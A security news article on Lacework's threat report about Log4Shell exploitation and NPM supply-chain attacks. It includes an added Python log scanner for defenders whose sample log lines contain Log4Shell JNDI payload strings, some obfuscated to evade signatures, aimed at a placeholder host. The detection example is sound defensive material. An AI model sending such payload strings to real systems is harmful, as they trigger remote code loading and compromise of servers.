Log4Shell Used in a Third of Malware Infections

The infamous Log4Shell vulnerability was exploited as an initial infection vector in 31% of cases monitored by Lacework over the past six months.

The software vendor’s latest Lacework Cloud Threat Report highlights the risks present in today’s digital supply chain.

Its findings confirm that the Log4j bug was used extensively by threat actors, as security experts had suspected when it emerged in December last year.

Lacework Labs said that while it initially observed a flood of requests carrying exploit payloads shortly after the Log4Shell disclosure, these were mainly the result of researchers scanning for the vulnerability. Over time, however, they were replaced by malicious requests as threat actors adopted publicly available proof-of-concept exploits.

“Over time, we watched scanning activity evolve into more frequent attacks, including some that deployed crypto-miners and Distributed Denial of Service (DDoS) bots to affected systems,” it explained.

“In addition to improving their payloads, adversaries continued to adapt their exploitation methods to stay ahead of signature-based detections used by many types of security products.”
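The cat-and-mouse dynamic the report describes, where a plain string signature for the exploit stops firing once attackers wrap the payload in nested lookups or URL-encoding, can be illustrated with a small defender-side log scanner. The example below is added here and is not code from the Lacework report or the article; the log lines are constructed, the `example.invalid` hostnames are reserved placeholders, and the normalisation handles the nested-lookup and percent-encoding forms that public detection rules commonly fold, which is an assumption about attacker behaviour rather than something the page states. It reports, per flagged line, whether a naive `${jndi:` substring match would also have caught it.

```python
"""Added example (not from the report or the article): scan constructed
web-server log lines for Log4Shell-style JNDI lookups, folding the nested
Log4j lookups and URL-encoding that defeat a plain substring signature."""
import re
import urllib.parse

# Innermost lookups contain no "${" or "}" of their own, so each pass folds one layer.
# ${lower:X} / ${upper:X} change case; ${anything:-X} yields the default value X
# (e.g. ${::-j} or ${env:UNSET:-j} both become "j").
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Fold percent-encoding and nested lookups until the string stops changing.
    The round limit keeps pathological input cheap to process."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the normalised text contains a JNDI lookup, regardless of case."""
    return "${jndi:" in normalize(text).lower()


def scan(lines):
    """Return (client_ip, caught_by_naive_signature) for each flagged log line."""
    hits = []
    for line in lines:
        if is_jndi_lookup(line):
            client_ip = line.split(" ", 1)[0]
            naive_hit = "${jndi:" in line.lower()  # the signature attackers learned to dodge
            hits.append((client_ip, naive_hit))
    return hits


# Constructed sample log lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain form in the User-Agent header
    '10.0.0.6 - - [11/Dec/2021:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    # nested case lookups hide the literal "jndi" and "ldap"
    '10.0.0.7 - - [11/Dec/2021:10:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:ldap}://example.invalid/a}"',
    # percent-encoded in the request path, with a default-value lookup inside
    '10.0.0.8 - - [11/Dec/2021:10:04:09 +0000] '
    '"GET /%24%7B%24%7B%3A%3A-j%7Dndi:rmi://example.invalid/a%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for ip, naive in scan(SAMPLE_LOG):
        print(f"{ip}: JNDI lookup; naive signature would {'catch' if naive else 'miss'} it")
```

Only the first malicious line is caught by the naive signature; the other two are flagged solely because the scanner normalises the request before matching, which is the gap the report says attackers exploited against signature-based products.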

Log4j wasn’t the only software dependency being abused in late 2021. Many threat actors used a backdoored version of the NPM package ua-parser-js to make Linux systems download and run the open-source cryptocurrency miner XMRig.

The original attacker had managed to compromise the NPM developer’s account to push a malicious update to the package.

In fact, threat actors increasingly favor NPM as a vector for attack. A report from Checkmarx this week claimed that attackers had streamlined the process of creating new NPM accounts from which to distribute supply chain malware.

“The attacker has fully automated the process of NPM account creation and has opened dedicated accounts, one per package, making his new malicious packages much harder to spot,” it explained.

“At the time of writing, the threat actor ‘RED-LILI’ is still active and continues to publish malicious packages.”